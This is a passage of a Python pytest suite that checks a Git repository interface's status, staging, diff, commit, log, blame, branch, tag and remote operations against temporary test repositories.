content(str): What to write
        add(bool): If True, add the file to the git repo
commit_msg (str): If not none, commit file with this message
Returns:
"""
working_dir = git_instance.config["working_directory"]
with open(os.path.join(working_dir, filename), 'wt') as dt:
dt.write(content)
if add:
git_instance.add(os.path.join(working_dir, filename))
if commit_msg:
git_instance.commit(commit_msg)
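# --- Hedged usage note (editor addition). ---
# Typical call pattern for the helper above inside a test, where `git` is one
# of the gitlib instances provided by the fixtures:
#
#   write_file(git, "notes.txt", "hello", commit_msg="add notes")
#   assert git.status()["untracked"] == []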
class GitInterfaceMixin(object):
"""Mixin to test the GitInterface"""
class_type: Any = None
def get_git_obj(self, config):
        raise NotImplementedError
def test_empty_dir(self, mock_config):
"""Test trying to get the filesystem interface"""
git = self.get_git_obj(mock_config)
assert type(git) is self.class_type
assert git.repo is None
def test_existing_repo(self, mock_config):
"""Test trying to load an existing repo dir"""
# Create a repo in the working dir
create_dummy_repo(mock_config["working_directory"])
# Create a GitFilesystem instance
git = self.get_git_obj(mock_config)
assert type(git) is self.class_type
assert type(git.repo) is Repo
def test_update_working_directory(self, mock_config):
"""Test trying to load an existing repo dir"""
# Create a repo in the working dir
create_dummy_repo(mock_config["working_directory"])
# Create a GitFilesystem instance
git = self.get_git_obj(mock_config)
assert type(git) is self.class_type
assert type(git.repo) is Repo
assert git.working_directory == mock_config["working_directory"]
new_working_dir = os.path.join(tempfile.gettempdir(), uuid.uuid4().hex)
os.makedirs(new_working_dir)
git.set_working_directory(new_working_dir)
assert git.repo is None
assert git.working_directory == new_working_dir
git.initialize()
assert type(git.repo) is Repo
shutil.rmtree(new_working_dir)
def test_clone_repo(self, mock_initialized_remote):
"""Test trying to clone an existing repo dir"""
scratch_working_dir = os.path.join(tempfile.gettempdir(), uuid.uuid4().hex)
os.makedirs(scratch_working_dir)
config = {"backend": get_backend(), "working_directory": scratch_working_dir}
git = self.get_git_obj(config)
git.clone(mock_initialized_remote[3])
assert len(git.repo.heads) == 1
assert len(git.repo.remotes["origin"].fetch()) == 2
assert len(git.repo.refs) == 5
# Make sure only master content
assert os.path.isfile(os.path.join(scratch_working_dir, 'test1.txt')) is True
assert os.path.isfile(os.path.join(scratch_working_dir, 'test2.txt')) is False
# Delete temp dir
shutil.rmtree(scratch_working_dir)
def test_author_invalid(self, mock_initialized):
"""Test changing the git author info"""
git = mock_initialized[0]
with pytest.raises(ValueError):
git.update_author('Test User')
with pytest.raises(ValueError):
git.update_author('Test User 1', committer='Test User 2')
with pytest.raises(ValueError):
git.update_author('Test User 1', committer=GitAuthor("Author", "a@test.com"))
with pytest.raises(ValueError):
git.update_author(GitAuthor("Author", "a@test.com"), committer="Test User 2")
def test_author(self, mock_initialized):
"""Test changing the git author info"""
git = mock_initialized[0]
# Test defaults
assert type(git.author) == GitAuthor
assert type(git.committer) == GitAuthor
assert git.author.name == "Gigantum AutoCommit"
assert git.author.email == "noreply@gigantum.io"
assert git.committer.name == "Gigantum AutoCommit"
assert git.committer.email == "noreply@gigantum.io"
# Test updating just author
git.update_author(GitAuthor("New Name", "test@test.com"))
assert git.author.name == "New Name"
assert git.author.email == "test@test.com"
assert git.committer.name == "Gigantum AutoCommit"
assert git.committer.email == "noreply@gigantum.io"
# Test updating both
git.update_author(GitAuthor("Author", "a@test.com"), GitAuthor("Committer", "c@test.com"))
assert git.author.name == "Author"
assert git.author.email == "a@test.com"
assert git.committer.name == "Committer"
assert git.committer.email == "c@test.com"
def test_status(self, mock_config):
"""Test getting the status of a repo as it is manipulated"""
# Create a repo in the working dir
create_dummy_repo(mock_config["working_directory"])
# Create a GitFilesystem instance
git = self.get_git_obj(mock_config)
# Create a complex repo with all possible states to check
# Add a normal committed file
write_file(git, "committed.txt", "File number 1\n", commit_msg="initial commit")
# Add a deleted file
write_file(git, "deleted.txt", "File number 2\n", commit_msg="delete file commit")
os.remove(os.path.join(mock_config["working_directory"], "deleted.txt"))
# Add a staged and edited file
write_file(git, "staged_edited.txt", "entry 1", commit_msg="edited initial")
write_file(git, "staged_edited.txt", "entry edited")
# Add a staged file
write_file(git, "staged.txt", "entry staged")
# Add an unstaged edited file
write_file(git, "unstaged_edited.txt", "entry 2")
write_file(git, "unstaged_edited.txt", "entry 2 edited", add=False)
# Add an untracked file
write_file(git, "untracked.txt", "entry untracked", add=False)
# Stage a file in a sub-directory
subdir = os.path.join(mock_config["working_directory"], "subdir")
os.makedirs(subdir)
write_file(git, os.path.join(subdir, "subdir_file.txt"), "entry subdir")
# Check status clean
status = git.status()
assert "staged" in status
assert status["staged"][0] == ('staged.txt', 'added')
assert status["staged"][1] == ('staged_edited.txt', 'modified')
assert status["staged"][2] == ('subdir/subdir_file.txt', 'added')
assert status["staged"][3] == ('unstaged_edited.txt', 'added')
assert "unstaged" in status
assert status["unstaged"][0] == ('deleted.txt', 'deleted')
assert status["unstaged"][1] == ('unstaged_edited.txt', 'modified')
assert "untracked" in status
assert status["untracked"] == ["untracked.txt"]
assert len(status["staged"]) == 4
assert len(status["unstaged"]) == 2
assert len(status["untracked"]) == 1
def test_add(self, mock_initialized):
"""Test adding a file to a repository"""
git = mock_initialized[0]
working_directory = mock_initialized[1]
print(f"mock_initialized={mock_initialized}")
# Create file
write_file(git, "add.txt", "entry 1", add=False)
# Verify untracked
status = git.status()
assert len(status["staged"]) == 0
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 1
assert status["untracked"] == ["add.txt"]
# Add file
git.add(os.path.join(working_directory, "add.txt"))
# Verify untracked
status = git.status()
assert len(status["staged"]) == 1
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 0
assert status["staged"][0] == ("add.txt", 'added')
def test_add_all_working_dir(self, mock_initialized):
"""Test adding all files and changes in the working directory"""
git = mock_initialized[0]
working_directory = mock_initialized[1]
# Create files
write_file(git, "file1.txt", "dsfgfghfghhsdf", commit_msg="first commit")
write_file(git, "file2.txt", "34356234532453", commit_msg="second commit")
# Create an untracked file, remove a file
write_file(git, "file2.txt", "343562345324535656", add=False)
write_file(git, "file3.txt", "jhgjhgffgdsfgdvdas", add=False)
os.remove(os.path.join(working_directory, "file1.txt"))
# Verify untracked
status = git.status()
assert len(status["staged"]) == 0
assert len(status["unstaged"]) == 2
assert len(status["untracked"]) == 1
assert status["untracked"] == ["file3.txt"]
# Add file
git.add_all()
# Verify untracked
status = git.status()
assert len(status["staged"]) == 3
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 0
assert status["staged"][0] == ("file1.txt", 'deleted')
assert status["staged"][1] == ("file2.txt", 'modified')
assert status["staged"][2] == ("file3.txt", 'added')
def test_add_all_sub_dir(self, mock_initialized):
"""Test adding all files and changes in a sub directory of the working directory"""
git = mock_initialized[0]
working_directory = mock_initialized[1]
os.makedirs(os.path.join(working_directory, "env"))
# Create files
write_file(git, os.path.join("untracked.txt"), "4545", add=False)
write_file(git, os.path.join('env', "file1.txt"), "dsfgfghfghhsdf", commit_msg="first commit")
write_file(git, os.path.join('env', "file2.txt"), "34356234532453", commit_msg="second commit")
# Create an untracked file, remove a file
write_file(git, os.path.join('env', "file2.txt"), "343562345324535656", add=False)
write_file(git, os.path.join('env', "file3.txt"), "jhgjhgffgdsfgdvdas", add=False)
os.remove(os.path.join(working_directory, 'env', "file1.txt"))
# Verify untracked
status = git.status()
assert len(status["staged"]) == 0
assert len(status["unstaged"]) == 2
assert len(status["untracked"]) == 2
assert status["untracked"] == ["env/file3.txt", "untracked.txt"]
# Add file
git.add_all("env")
# Verify untracked
status = git.status()
assert len(status["staged"]) == 3
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 1
assert status["staged"][0] == ("env/file1.txt", 'deleted')
assert status["staged"][1] == ("env/file2.txt", 'modified')
assert status["staged"][2] == ("env/file3.txt", 'added')
def test_remove_staged_file(self, mock_initialized):
"""Test removing files from a repository"""
git = mock_initialized[0]
working_directory = mock_initialized[1]
# Create file
write_file(git, "staged.txt", "entry 1")
# Verify staged
status = git.status()
assert len(status["staged"]) == 1
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 0
assert status["staged"][0] == ("staged.txt", 'added')
# Remove
git.remove(os.path.join(working_directory, "staged.txt"))
# Verify removed
status = git.status()
assert len(status["staged"]) == 0
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 1
assert status["untracked"] == ["staged.txt"]
def test_remove_committed_file(self, mock_initialized):
"""Test removing files from a repository"""
git = mock_initialized[0]
working_directory = mock_initialized[1]
# Create file
write_file(git, "staged.txt", "entry 1", commit_msg="Test commit")
# Verify nothing staged
status = git.status()
assert len(status["staged"]) == 0
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 0
# Remove
git.remove(os.path.join(working_directory, "staged.txt"))
# Verify removed
status = git.status()
assert len(status["staged"]) == 1
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 1
assert status["untracked"] == ["staged.txt"]
assert status["staged"][0] == ("staged.txt", "deleted")
def test_remove_committed_file_delete(self, mock_initialized):
"""Test removing file from a repository and delete it"""
git = mock_initialized[0]
working_directory = mock_initialized[1]
# Create file
write_file(git, "staged.txt", "entry 1", commit_msg="Test commit")
# Verify nothing staged
status = git.status()
assert len(status["staged"]) == 0
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 0
# Remove
git.remove(os.path.join(working_directory, "staged.txt"), keep_file=False)
# Verify removed
status = git.status()
assert len(status["staged"]) == 1
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 0
assert status["staged"][0] == ("staged.txt", "deleted")
def test_diff_unstaged(self, mock_initialized):
"""Test getting the diff for unstaged changes"""
git = mock_initialized[0]
working_directory = mock_initialized[1]
# Create files
with open(os.path.join(working_directory, "test.txt"), 'wt') as dt:
dt.write("Line Top\n")
for val in range(0, 30):
dt.write("Line {}\n".format(val))
dt.write("Line Bottom\n")
with open(os.path.join(working_directory, "test2.txt"), 'wt') as dt:
dt.write("File number 2\n")
git.add(os.path.join(working_directory, "test.txt"))
git.add(os.path.join(working_directory, "test2.txt"))
git.repo.index.commit("commit 1")
# Edit file 1 - Add a line
with open(os.path.join(working_directory, "test.txt"), 'wt') as dt:
dt.write("Line Top Has Changed\n")
for val in range(0, 30):
dt.write("Line {}\n".format(val))
dt.write("Line Bottom Has Changed\n")
# Edit file 2
with open(os.path.join(working_directory, "test2.txt"), 'wt') as dt:
dt.write("File number 2 changed\n")
diff_info = git.diff_unstaged()
assert len(diff_info.keys()) == 2
assert "test.txt" in diff_info
assert len(diff_info["test.txt"]) == 2
assert "test2.txt" in diff_info
assert len(diff_info["test2.txt"]) == 1
def test_diff_unstaged_file(self, mock_initialized):
"""Test getting the diff of a file that has been changed"""
git = mock_initialized[0]
working_directory = mock_initialized[1]
# Create files
with open(os.path.join(working_directory, "test.txt"), 'wt') as dt:
dt.write("Line Top\n")
for val in range(0, 30):
dt.write("Line {}\n".format(val))
dt.write("Line Bottom\n")
with open(os.path.join(working_directory, "test2.txt"), 'wt') as dt:
dt.write("File number 2\n")
git.add(os.path.join(working_directory, "test.txt"))
git.add(os.path.join(working_directory, "test2.txt"))
git.repo.index.commit("commit 1")
# Edit file 1 - Add a line
with open(os.path.join(working_directory, "test.txt"), 'wt') as dt:
dt.write("Line Top Has Changed\n")
for val in range(0, 30):
dt.write("Line {}\n".format(val))
dt.write("Line Bottom Has Changed\n")
# Edit file 2
with open(os.path.join(working_directory, "test2.txt"), 'wt') as dt:
dt.write("File number 2 changed\n")
diff_info = git.diff_unstaged("test.txt")
assert len(diff_info.keys()) == 1
assert "test.txt" in diff_info
assert len(diff_info["test.txt"]) == 2
def test_diff_staged(self, mock_initialized):
"""Test getting the diff for staged changes"""
git = mock_initialized[0]
working_directory = mock_initialized[1]
# Create files
with open(os.path.join(working_directory, "test.txt"), 'wt') as dt:
dt.write("Line Top\n")
for val in range(0, 30):
dt.write("Line {}\n".format(val))
dt.write("Line Bottom\n")
with open(os.path.join(working_directory, "test2.txt"), 'wt') as dt:
dt.write("File number 2\n")
git.add(os.path.join(working_directory, "test.txt"))
git.add(os.path.join(working_directory, "test2.txt"))
git.repo.index.commit("commit 1")
# Edit file 1 - Add a line
with open(os.path.join(working_directory, "test.txt"), 'wt') as dt:
dt.write("Line Top Has Changed\n")
for val in range(0, 30):
dt.write("Line {}\n".format(val))
dt.write("Line Bottom Has Changed\n")
# Edit file 2
with open(os.path.join(working_directory, "test2.txt"), 'wt') as dt:
dt.write("File number 2 changed\n")
git.add(os.path.join(working_directory, "test.txt"))
git.add(os.path.join(working_directory, "test2.txt"))
diff_info = git.diff_staged()
assert len(diff_info.keys()) == 2
assert "test.txt" in diff_info
assert len(diff_info["test.txt"]) == 2
assert "test2.txt" in diff_info
assert len(diff_info["test2.txt"]) == 1
def test_diff_staged_file(self, mock_initialized):
"""Test getting the diff of a file that has been changed and staged"""
git = mock_initialized[0]
working_directory = mock_initialized[1]
# Create file
with open(os.path.join(working_directory, "test.txt"), 'wt') as dt:
dt.write("Line Top\n")
for val in range(0, 30):
dt.write("Line {}\n".format(val))
dt.write("Line Bottom\n")
with open(os.path.join(working_directory, "test2.txt"), 'wt') as dt:
dt.write("File number 2\n")
git.add(os.path.join(working_directory, "test.txt"))
git.add(os.path.join(working_directory, "test2.txt"))
git.repo.index.commit("commit 1")
# Edit file 1 - Add a line
with open(os.path.join(working_directory, "test.txt"), 'wt') as dt:
dt.write("Line Top Has Changed\n")
for val in range(0, 30):
dt.write("Line {}\n".format(val))
dt.write("Line Bottom Has Changed\n")
# Edit file 2
with open(os.path.join(working_directory, "test2.txt"), 'wt') as dt:
dt.write("File number 2 changed\n")
git.add(os.path.join(working_directory, "test.txt"))
git.add(os.path.join(working_directory, "test2.txt"))
diff_info = git.diff_staged("test.txt")
assert len(diff_info.keys()) == 1
assert "test.txt" in diff_info
assert len(diff_info["test.txt"]) == 2
def test_diff_commits(self, mock_initialized):
"""Test getting the diff between commits in a branch"""
git = mock_initialized[0]
working_directory = mock_initialized[1]
# Create files
write_file(git, "test1.txt", "File number 1\n")
write_file(git, "test2.txt", "File number 2\n", commit_msg="commit 1")
commit1 = git.repo.head.commit
# Edit file 1 - Add a line
write_file(git, "test1.txt", "File number 1 has changed\n", commit_msg="commit 2")
commit2 = git.repo.head.commit
# Edit file 2
write_file(git, "test2.txt", "File number 2 has changed\n", commit_msg="commit 3")
commit3 = git.repo.head.commit
# Create another file
write_file(git, "test3.txt", "File number 3\n", commit_msg="commit 4")
commit4 = git.repo.head.commit
# Diff with defaults (HEAD compared to previous commit)
diff_info = git.diff_commits()
assert len(diff_info.keys()) == 1
assert "test3.txt" in diff_info
assert len(diff_info["test3.txt"]) == 1
# Diff HEAD with first commit
diff_info = git.diff_commits(commit_a=commit1.hexsha)
assert len(diff_info.keys()) == 3
assert "test1.txt" in diff_info
assert "test2.txt" in diff_info
assert "test3.txt" in diff_info
assert len(diff_info["test1.txt"]) == 1
assert len(diff_info["test2.txt"]) == 1
assert len(diff_info["test3.txt"]) == 1
# Diff two middle commits
diff_info = git.diff_commits(commit_a=commit2.hexsha, commit_b=commit3.hexsha)
assert len(diff_info.keys()) == 1
assert "test2.txt" in diff_info
assert len(diff_info["test2.txt"]) == 1
def test_commit(self, mock_initialized):
"""Test making a commit"""
git = mock_initialized[0]
working_directory = mock_initialized[1]
# Create files
write_file(git, "test1.txt", "File number 1\n")
subdir = os.path.join(working_directory, "subdir")
os.makedirs(subdir)
write_file(git, os.path.join(subdir, "subdir_file.txt"), "entry subdir")
write_file(git, "untracked.txt", "Untracked File", add=False)
status = git.status()
assert len(status["staged"]) == 2
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 1
assert status["untracked"] == ["untracked.txt"]
assert status["staged"][1] == ("test1.txt", "added")
assert status["staged"][0] == (os.path.join("subdir", "subdir_file.txt"), "added")
# Make commit
git.commit("commit 1")
# Verify
status = git.status()
assert len(status["staged"]) == 0
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 1
assert status["untracked"] == ["untracked.txt"]
assert git.repo.head.commit.message == "commit 1"
assert git.repo.head.commit.author.name == "Gigantum AutoCommit"
assert git.repo.head.commit.author.email == "noreply@gigantum.io"
def test_commit_with_author(self, mock_initialized):
"""Test making a commit"""
git = mock_initialized[0]
# Create files
write_file(git, "test1.txt", "File number 1\n")
status = git.status()
assert len(status["staged"]) == 1
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 0
assert status["staged"][0] == ("test1.txt", "added")
# Make commit
git.commit("commit message test",
author=GitAuthor("Test User 1", "user@gigantum.io"),
committer=GitAuthor("Test User 2", "user2@gigantum.io"))
# Verify
status = git.status()
assert len(status["staged"]) == 0
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 0
assert git.repo.head.commit.message == "commit message test"
assert git.repo.head.commit.author.name == "Test User 1"
assert git.repo.head.commit.author.email == "user@gigantum.io"
assert git.repo.head.commit.committer.name == "Test User 2"
assert git.repo.head.commit.committer.email == "user2@gigantum.io"
assert git.author.__dict__ == GitAuthor("Test User 1", "user@gigantum.io").__dict__
assert git.committer.__dict__ == GitAuthor("Test User 2", "user2@gigantum.io").__dict__
def test_log(self, mock_initialized):
"""Test getting commit history"""
git = mock_initialized[0]
# Create files
commit_list = []
write_file(git, "test1.txt", "File number 1\n", commit_msg="commit 1")
commit_list.append(git.repo.head.commit)
write_file(git, "test2.txt", "File number 2\n", commit_msg="commit 2")
commit_list.append(git.repo.head.commit)
# Edit file 1 - Add a line
write_file(git, "test1.txt", "File 1 has changed\n", commit_msg="commit 3")
commit_list.append(git.repo.head.commit)
# Edit file 2
write_file(git, "test2.txt", "File 2 has changed\n", commit_msg="commit 4")
commit_list.append(git.repo.head.commit)
# Create another file
write_file(git, "test3.txt", "File number 3\n")
git.commit("commit 5", author=GitAuthor("U1", "test@gigantum.io"),
committer=GitAuthor("U2", "test2@gigantum.io"))
commit_list.append(git.repo.head.commit)
# Get history
log_info = git.log()
assert len(log_info) == 6
# Check, reverse commit_list and drop last commit from log (which was the initial commit in the
# setup fixture). This orders from most recent to least and checks
for truth, log in zip(reversed(commit_list), log_info[:-1]):
assert log["author"] == {"name": truth.author.name, "email": truth.author.email}
assert log["committer"] == {"name": truth.committer.name, "email": truth.committer.email}
assert log["message"] == truth.message
assert log["commit"] == truth.hexsha
# Get history for a single file
log_info = git.log(filename="test2.txt")
assert len(log_info) == 2
log_info[0]["message"] = "commit 4"
log_info[1]["message"] = "commit 2"
def test_log_page(self, mock_initialized):
"""Test getting commit history"""
git = mock_initialized[0]
# Create files
commit_list = []
write_file(git, "test1.txt", "File number 1\n", commit_msg="commit 1")
commit_list.append(git.repo.head.commit)
write_file(git, "test2.txt", "File number 2\n", commit_msg="commit 2")
commit_list.append(git.repo.head.commit)
# Edit file 1 - Add a line
write_file(git, "test1.txt", "File 1 has changed\n", commit_msg="commit 3")
commit_start = git.repo.head.commit
commit_list.append(git.repo.head.commit)
# Edit file 2
write_file(git, "test2.txt", "File 2 has changed\n", commit_msg="commit 4")
commit_list.append(git.repo.head.commit)
# Create another file
write_file(git, "test3.txt", "File number 3\n")
git.commit("commit 5", author=GitAuthor("U1", "test@gigantum.io"),
committer=GitAuthor("U2", "test2@gigantum.io"))
commit_list.append(git.repo.head.commit)
# Get history
log_info = git.log(path_info=commit_start)
assert len(log_info) == 4
assert commit_list[2].hexsha == commit_start.hexsha
assert log_info[0]['commit'] == commit_list[2].hexsha
assert log_info[1]['commit'] == commit_list[1].hexsha
assert log_info[2]['commit'] == commit_list[0].hexsha
# Get history
log_info = git.log(path_info=commit_start, max_count=2)
assert len(log_info) == 2
assert commit_list[2].hexsha == commit_start.hexsha
assert log_info[0]['commit'] == commit_list[2].hexsha
assert log_info[1]['commit'] == commit_list[1].hexsha
def test_log_filter(self, mock_initialized):
"""Test getting commit history with some filtering"""
git = mock_initialized[0]
# Create files
commit_list = []
write_file(git, "test1.txt", "File number 1\n", commit_msg="commit 1")
commit_list.append(git.repo.head.commit)
write_file(git, "test2.txt", "File number 2\n", commit_msg="commit 2")
commit_list.append(git.repo.head.commit)
# Edit file 1 - Add a line
write_file(git, "test1.txt", "File 1 has changed\n", commit_msg="commit 3")
commit_list.append(git.repo.head.commit)
# Edit file 2
write_file(git, "test2.txt", "File 2 has changed\n", commit_msg="commit 4")
commit_list.append(git.repo.head.commit)
# Create another file
write_file(git, "test3.txt", "File number 3\n")
git.commit("commit 5", author=GitAuthor("U1", "test@gigantum.io"),
committer=GitAuthor("U2", "test2@gigantum.io"))
commit_list.append(git.repo.head.commit)
# Get history, limit to 2
log_info = git.log(max_count=2)
assert len(log_info) == 2
log_info[0]["message"] = "commit 5"
log_info[1]["message"] = "commit 4"
# Get history, limit to 2 and skip 2
log_info = git.log(max_count=2, skip=2)
assert len(log_info) == 2
log_info[0]["message"] = "commit 3"
log_info[1]["message"] = "commit 2"
# Get history, limit to 1 day in the future
log_info = git.log(since=datetime.datetime.now() + datetime.timedelta(days=1))
assert len(log_info) == 0
# Get history, limit to U1 author
log_info = git.log(author="U1")
assert len(log_info) == 1
log_info[0]["message"] = "commit 5"
def test_blame(self, mock_initialized):
"""Test getting blame history for a file"""
git = mock_initialized[0]
working_dir = mock_initialized[1]
# Create files
write_file(git, "test1.txt", "Write 1 by default\nWrite 2 by default\nWrite 3 by default\n", commit_msg="commit 1")
commit1 = git.repo.head.commit
with open(os.path.join(working_dir, "test1.txt"), 'at') as dt:
dt.write("Write 1 by U1\n")
git.add(os.path.join(working_dir, "test1.txt"))
git.commit("commit 2", author=GitAuthor("U1", "test@gigantum.io"),
committer=GitAuthor("U2", "test2@gigantum.io"))
commit2 = git.repo.head.commit
with open(os.path.join(working_dir, "test1.txt"), 'at') as dt:
dt.write("Write 4 by default\nWrite 5 by default\n")
git.add(os.path.join(working_dir, "test1.txt"))
git.commit("commit 3", author=GitAuthor("Gigantum AutoCommit", "noreply@gigantum.io"),
committer=GitAuthor("Gigantum AutoCommit", "noreply@gigantum.io"))
commit3 = git.repo.head.commit
# write second line
with open(os.path.join(working_dir, "test1.txt"), 'wt') as dt:
dt.write("Write 1 by default\nEDIT 2 by default\nWrite 3 by default\nWrite 1 by U1\nWrite 4 by default\nWrite 5 by default\n")
git.add(os.path.join(working_dir, "test1.txt"))
git.commit("commit 4")
commit4 = git.repo.head.commit
blame_info = git.blame("test1.txt")
assert len(blame_info) == 5
assert blame_info[0]["commit"] == commit1.hexsha
assert blame_info[1]["commit"] == commit4.hexsha
assert blame_info[2]["commit"] == commit1.hexsha
assert blame_info[3]["commit"] == commit2.hexsha
assert blame_info[4]["commit"] == commit3.hexsha
assert blame_info[0]["author"]["name"] == "Gigantum AutoCommit"
assert blame_info[1]["author"]["name"] == "Gigantum AutoCommit"
assert blame_info[2]["author"]["name"] == "Gigantum AutoCommit"
assert blame_info[3]["author"]["name"] == "U1"
assert blame_info[4]["author"]["name"] == "Gigantum AutoCommit"
assert blame_info[4]["content"] == "Write 4 by default\nWrite 5 by default"
def test_create_branch(self, mock_initialized):
"""Method to test creating a branch"""
git = mock_initialized[0]
working_dir = mock_initialized[1]
branches = git.repo.heads
assert len(branches) == 1
assert branches[0].name == "master"
git.create_branch("test_branch1")
branches = git.repo.heads
assert len(branches) == 2
assert branches[0].name == "master"
assert branches[1].name == "test_branch1"
def test_rename_branch(self, mock_initialized):
"""Method to test deleting a branch"""
git = mock_initialized[0]
branches = git.repo.heads
assert len(branches) == 1
assert branches[0].name == "master"
git.create_branch("test_branch1")
git.create_branch("test_branch2")
branches = git.repo.heads
assert len(branches) == 3
assert branches[0].name == "master"
assert branches[1].name == "test_branch1"
assert branches[2].name == "test_branch2"
# Rename branch
git.rename_branch("test_branch2", "my_new_branch")
branches = git.repo.heads
assert len(branches) == 3
assert branches[0].name == "master"
assert branches[1].name == "my_new_branch"
assert branches[2].name == "test_branch1"
# Make sure invalid branch names raise an exception
with pytest.raises(ValueError):
git.rename_branch("a;lskjdfas;lkjhdf", "test2")
# Rename checked out branch
git.rename_branch("master", "new_master")
branches = git.repo.heads
assert len(branches) == 3
assert branches[0].name == "my_new_branch"
assert branches[1].name == "new_master"
assert branches[2].name == "test_branch1"
def test_checkout_branch(self, mock_initialized):
"""Method to test checkout a branch"""
git = mock_initialized[0]
assert git.repo.head.ref.name == "master"
git.create_branch("test_branch1")
import pprint
pprint.pprint(git.repo.head.ref.name)
# BVB NOTE!! I changed behavior so "create_branch" also checks out that new branch
#assert git.repo.head.ref.name == "master" # <-- Original behavior
assert git.repo.head.ref.name == "test_branch1" # <-- New behavior following BVB changes
# Checkout branch
git.checkout("test_branch1")
assert git.repo.head.ref.name == "test_branch1"
# Make sure invalid branch names raise an exception
with pytest.raises(ValueError):
git.checkout("a;lskjdfas;lkjhdf")
def test_checkout_branch_context(self, mock_initialized):
"""Method to test checkout context ID file getting removed """
git = mock_initialized[0]
assert git.repo.head.ref.name == "master"
git.create_branch("test_branch1")
assert git.repo.head.ref.name == "test_branch1"
# Write a checkout context file for this test
os.makedirs(os.path.join(git.working_directory, '.gigantum'))
checkout_file = os.path.join(git.working_directory, '.gigantum', '.checkout')
with open(checkout_file, 'wt') as cf:
cf.write("dummy_id")
assert os.path.exists(checkout_file) is True
# Checkout branch
git.checkout("test_branch1")
assert os.path.exists(checkout_file) is False
def test_list_branches(self, mock_initialized_remote):
"""Method to test listing branches"""
git = mock_initialized_remote[0]
git.create_branch("test_remote_branch")
git.publish_branch("test_remote_branch")
git.create_branch("test_local_branch")
branches = git.list_branches()
assert len(branches["local"]) == 3
assert len(branches["remote"]) == 4
assert "test_local_branch" in branches["local"]
assert "test_remote_branch" in branches["local"]
assert "origin/test_local_branch" not in branches["remote"]
assert "origin/test_remote_branch" in branches["remote"]
def test_delete_branch(self, mock_initialized_remote):
"""Method to test deleting branches"""
git = mock_initialized_remote[0]
git.create_branch("test_remote_branch")
git.publish_branch("test_remote_branch")
git.create_branch("test_local_branch")
branches = git.list_branches()
assert len(branches["local"]) == 3
assert len(branches["remote"]) == 4
# Delete local branch
git.checkout("master") # <-- BVB Note, this was added for change in create_branch semantics.
git.delete_branch("test_local_branch")
branches = git.list_branches()
assert len(branches["local"]) == 2
assert len(branches["remote"]) == 4
# Delete remote branch, locally only
git.checkout("master")
git.delete_branch("test_remote_branch")
branches = git.list_branches()
assert len(branches["local"]) == 1
assert branches["local"][0] == "master"
assert len(branches["remote"]) == 4
# Delete remote branch on remote
git.delete_branch("test_remote_branch", delete_remote=True)
branches = git.list_branches()
assert len(branches["local"]) == 1
assert branches["local"][0] == "master"
assert len(branches["remote"]) == 3
def test_existing_tag_fail(self, mock_initialized):
"""Method to test creating an existing tag, should fail"""
git = mock_initialized[0]
git.create_tag("test_tag_1", "test tag 1")
# Should fail on an existing tag
with pytest.raises(GitCommandError):
git.create_tag("test_tag_1", "test tag 1 should fail!")
def test_tags(self, mock_initialized):
"""Method to test creating and listing tags"""
git = mock_initialized[0]
# Test creating a new tag
git.create_tag("tag1", "test tag 1")
write_file(git, "test1.txt", "content", commit_msg="Adding a file")
git.create_tag("tag2", "test tag 2")
tags = git.list_tags()
assert len(tags) == 2
assert tags[0]["name"] == "tag1"
assert tags[0]["message"] == "test tag 1"
assert tags[1]["name"] == "tag2"
assert tags[1]["message"] == "test tag 2"
def test_add_remove_remote(self, mock_initialized_remote):
"""Method to test creating and listing tags"""
scratch_working_dir = os.path.join(tempfile.gettempdir(), uuid.uuid4().hex)
os.makedirs(scratch_working_dir)
config = {"backend": get_backend(), "working_directory": scratch_working_dir}
# Init the empty repo
git = get_fs_class()(config)
git.initialize()
remote_dir = mock_initialized_remote[3]
git.add_remote("origin", remote_dir)
remotes = git.list_remotes()
assert len(remotes) == 1
assert remotes[0]["name"] == "origin"
assert remotes[0]["url"] == remote_dir
git.remove_remote("origin")
assert len(git.list_remotes()) == 0
# Delete temp dir
shutil.rmtree(scratch_working_dir)
def test_publish_branch(self, mock_initialized_remote):
"""Method to test creating and listing tags"""
# Get a clone of the remote repo
git = mock_initialized_remote[0]
branches = git.repo.heads
assert len(branches) == 1
assert branches[0].name == "master"
# Create a branch
git.create_branch("test_branch1")
# Publish the branch
git.publish_branch("test_branch1", "origin")
branches = git.repo.heads
assert len(branches) == 2
assert branches[0].name == "master"
assert branches[1].name == "test_branch1"
# Create a new clone and make sure you got your branches
test_working_dir = os.path.join(tempfile.gettempdir(), uuid.uuid4().hex)
os.makedirs(test_working_dir)
test_repo = Repo.clone_from(mock_initialized_remote[3], test_working_dir)
assert len(test_repo.remotes["origin"].fetch()) == 3
def test_fetch_pull(self, mock_initialized_remote):
"""Method to fetch, pull from remote"""
cloned_working_dir = mock_initialized_remote[1]
# Get a clone of the remote repo
git = mock_initialized_remote[0]
assert len(git.repo.heads) == 1
assert len(git.repo.remotes["origin"].fetch()) == 2
assert len(git.repo.refs) == 5
# Make sure only master content
assert os.path.isfile(os.path.join(cloned_working_dir, 'test1.txt')) is True
assert os.path.isfile(os.path.join(cloned_working_dir, 'test2.txt')) is False
# check out a branch and pull it
git.checkout("test_branch")
git.pull()
assert len(git.repo.heads) == 2
# Make sure it pulled content
assert os.path.isfile(os.path.join(cloned_working_dir, 'test1.txt')) is True
assert os.path.isfile(os.path.join(cloned_working_dir, 'test2.txt')) is True
# Add a file
scratch_working_dir = os.path.join(tempfile.gettempdir(), uuid.uuid4().hex)
os.makedirs(scratch_working_dir)
config = {"backend": get_backend(), "working_directory": scratch_working_dir}
# Init the empty repo
git_updater = get_fs_class()(config)
git_updater.clone(mock_initialized_remote[3])
git_updater.checkout("test_branch")
# Add a file to master and commit
write_file(git_updater, "test3.txt", "adding a new file Content", commit_msg="add commit")
git_updater.repo.remotes.origin.push()
# Make sure it pulled content
